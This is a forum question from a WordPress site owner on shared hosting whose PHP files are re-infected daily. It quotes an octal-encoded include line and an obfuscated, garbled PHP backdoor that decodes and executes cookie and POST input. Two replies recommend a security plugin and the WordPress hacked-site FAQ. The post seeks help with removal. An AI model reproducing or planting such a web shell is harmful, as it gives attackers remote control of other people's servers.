# Affected php files randomly changed in WordPress site

Tags: php, wordpress, shared-hosting, malware

I found uploaded/modificated files in my sheltered sites on a shared server  a month ago . as examples;

```
/ * A * f839 /

154c / 154m / \ 167p- \ 151nc \ 154ud \ 145s / \ 157i \ 163ta \ 156bu \ 154.c \ 157m / \ 167p- \ 151nc \ 154ud \ 145t \ 151 Up \ 147es \ 057.3 \ 066e0 \ 14381 \ 071. the \ 143o ";

/ * A * f839 /
```

this definition is on the first line of index.php and wp-admin.php. However, this is done by changing the file, not by editing. I understand this from the date of the filing. The index.php file is updated every day with a file prepared in 2017, although the system is not open in 2018.

there are also random .php file names in the WordPress directory associated with this problem, such as asdf.php, which are constantly changing, untraceable filenames. In the contents of these files,

```
<? Php
$ ltmwf [25]. $ ltmwf [25]. $ ltmwf [25]. $ ltmwf [28]. $ ltmwf [11]. $ lmwf [ . $ ltmwf [5]. $ ltmwf [6]. $ ltmwf [6]. $ ltmwf [5]. $ ltmwf [2]. $ ltmwf [28]. $ ltmwf [28]. $ ltmwf [31]. $ ltmwf [34]. $ ltmwf [2]. $ ltmwf [5]. $ ltmwf [28]. $ ltmwf [34]. $ ltmwf [12]. $ ltmwf [2]. $ ltmwf [20]. $ ltmwf [ 0]. $ ltmwf [0]. $ ltmwf [26]. $ ltmwf [2]. $ ltmwf [31]. $ ltmwf [24]. $ ltmwf [28]. $ ltmwf [35]. $ ltmwf [11] $ ltmwf [25]. $ ltmwf [28]. $ ltmwf [15]. $ ltmwf [0]. $ ltmwf [ [18]. $ Ltmwf [19]; ​​$ daitkgq [] = $ ltmwf [9]; $ daitkgq [] = $ ltmwf [11]. $ ltmwf [3]. $ ltmwf [23]. $ ltmwf [23]. $ ltmwf [23]. $ ltmwf [ 4]. $ Ltmwf [6]. $ Ltmwf [6]. $ Ltmwf [7]. $ Ltmwf [7]. $ ltmwf [21]. $ ltmwf [21]. $ ltmwf [21]. $ ltmwf [21]. $ ltmwf [ $ Ltmwf [3]. $ Ltmwf [3]; $ ltmwf [16]. $ Ltmwf [3]. $ ltmwf [8]. $ ltmwf [6]. $ ltmwf [3]. $ ltmwf [17]. $ ltmwf [6]; $ ltmwf [23]. $ ltmwf [23]. $ ltmwf [3]. $ ltmwf [7]. ($ daitkgq [7] ($ _ COOKIE, $ _POST) as $ vayacmf => $ pauaf) {function $ umdraw ($ daitkgq, $] $ ltmwf [ vayacmf, $ ujniwap) {return $ daitkgq [6] ($ daitkgq [4] ($ vayacmf. $ daitkgq [9] ($ ($ daitkgq [8] ($ vayacmf)) + 1, 0, $ ujniwap) ($ iawmjas [1], $ iawmjas); $ function {$ iawmjas} $ {$ iawmjas} $ {$ iawmjas} $ daitkgq [5] ($ daitkgq [2], $ pauaf ^ umdraw ($ daitkgq, $ daitkgq, $ daitkgq, $ daitkgq, $ daitkgq, $ daitkgq [2])); , $ vayacmf, $ daitkgq [8] ($ paaf)));
```

I cleaned all the findings a few times but it is being reproduced every day. I think I can trigger the crush because I am on a shared server, but I have not found anything on my own.

Comment: I think your website is got hacked. please install wordfence security plugin and clean up

Comment: Also: https://codex.wordpress.org/FAQ_My_site_was_hacked